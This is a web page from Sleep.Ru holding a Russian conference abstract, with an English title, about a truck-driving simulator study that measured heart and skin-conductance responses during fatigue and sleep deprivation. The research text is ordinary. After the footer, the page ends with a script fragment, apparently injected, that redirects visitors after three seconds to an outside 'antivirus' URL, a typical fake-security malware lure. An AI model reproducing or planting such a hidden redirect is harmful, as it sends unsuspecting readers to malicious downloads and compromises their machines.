Rambler's Top100    Sleep.Ru - На главную страницу
2-я Российская школа-конференция “Сон - окно в мир бодрствования”
 пред. | след. >> оглавление тезисов    ENGLISH



АВТОМОБИЛЬНЫЕ СИМУЛЯТОРЫ: ДИНАМИКА ВЕГЕТАТИВНЫХ ПОКАЗАТЕЛЕЙ ПРИ УТОМЛЕНИИ И СНИЖЕНИИ УРОВНЯ БОДРСТВОВАНИЯ

Дорохов В.Б., Дементиенко В.В., Марков А.Г., Шахнарович В.М., Индурский П.А.,
Лаврова Т.М., Новикова Н.В., Каплан А.Я., Бабин Д.Н., Мымрин В.В., Самоненко И.Ю.
Институт высшей нервной деятельности и нейрофизиологии РАН, ЗАО "Нейроком",
МГУ им М.В. Ломоносова. Москва

CAR SIMULATOR OF THE TIME-COURSE OF AUTONOMIC INDICES DURING FATIGUE AND CONSCIOUS LEVEL DECREASE

Dorokhov V.B., Dementienko V.V., Markov A.G., Shakhnarovich V.M., Indursky P.A., Lavrova T.M., Novikova N.V., Kaplan A. Ya., Babin D.N., Mymrin V.V., Samonenko I.Yu.
Moscow State University,
Institute of Higher Nervous Activity and Neurophysiology RAS, Moscow, Russia
ZAO "Neurokom", Moscow

Развитие утомления и критических состояний сонливости при длительном вождении автомобиля является причиной различных инцидентов на транспорте. Исследования причин возникновения нарушений вождения в реальных условиях затруднено, в связи с риском для жизни водителя. Современные автомобильные симуляторы, основанные на технологиях "виртуальной реальности", дают возможность проводить такого рода исследования в условиях максимально приближенным к реальности. При этом особую роль играет реалистичность игрового мира, опыт вождения автомобиля и автоматизмы водителя. Появления ошибок вождения, как в реальном, так и в виртуальном мирах имеет много причин, следствием чего является наличие разных классификаций ошибок деятельности.

На начальном этапе исследований нас интересовала возможность объективной и субъективной оценки сложности маршрута и изменение этих оценок при развитии усталости и снижении уровня бодрствования. Для решения этой задачи были использованы вегетативные показатели, отражающие уровень активированности испытуемого: электрокардиограмма (ЭКГ) и кожно-гальваническая реакции (КГР).

МЕТОДИКА: В наших исследованиях использовался автомобильный симулятор, имитирующий вождение на грузовике водителя"дальнобойщика" по длительному кольцевому маршруту. Время однократного прохождения кольцевого маршрута было 40-60 минут, количество кругов варьировало от 3 до 7 и. таким образом, общее время нахождения за рулем могло достигать 6-7 часов. Опрос испытуемых показал, что состояние утомления начинало развиваться на 3-4 кругах, что довольно часто сопровождалось появлением ошибок вождения и авариями. В автомобильном симуляторе была использована игровая программа "Дальнобойщики-2", которая позволяет сохранять видеофильм с результатами вождения в игровом мире и запоминать параметры управления автомобилем: повороты руля, переключение передач, скорость, обороты двигателя, наличие бензина и т.д. Синхронно с вождением на втором компьютере (сомнологический полиграф SAGURA-2000, Германия) проводилась регистрация физиологических, поведенческих и субъективных показателей испытуемого:

Физиологические показатели: ЭКГ (1 канал), КГР (2), ЭОГ (2), ЭЭГ (4), ЭМГ (1), температура (1), пульсоксиметрия (SpO2, плетизмограмма, пульс), дыхание (1), голос.

Поведенческие показатели: 1) Видеофильм с поведением водителя 2) Метки - при прохождении определенных точек маршрута и появление значимых событий.

Субъективные показатели: Диалог водителя и методиста: вопросы, ответы, отчет об ошибках. Психологическое тестирование проводилось: 1) до и после эксперимента, 2) во время эксперимента, при кратковременных остановках после окончания круга.

Компьютеры симулятора и полиграфа объединены локальной сетью и имеют общее компьютерное время, что существенно для временного сопоставления и анализа событий в виртуальном мире и полиграфических показателей испытуемого.

РЕЗУЛЬТАТЫ: Проведена предварительная оценка сложности прохождения отдельных точек маршрута по ЭКГ и КГР показателям. Проанализированы изменения этой оценки в зависимости от исходного состояния испытуемого: 1) после ночной депривации сна и 2) без депривации сна. Получены предварительные результаты о динамики ЭКГ и КГР показателей при развитии утомления и возможности их использования в качестве предикторов появления ошибок вождения. Показана возможность классификации ошибок водителя с учетом характера маршрута, психофизиологических показателей качества вождения и индивидуальных особенностей водителя.

 


 
2-я Российская школа-конференция по сну :    Тезисы | Abstract list (ENGLISH)    
     Наверх Sleep.Ru :     Оборудование  |  Конференции  |   Библиотека  |  Ссылки      
  © 2001 Sleep.Ru   Rambler's Top100     
setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>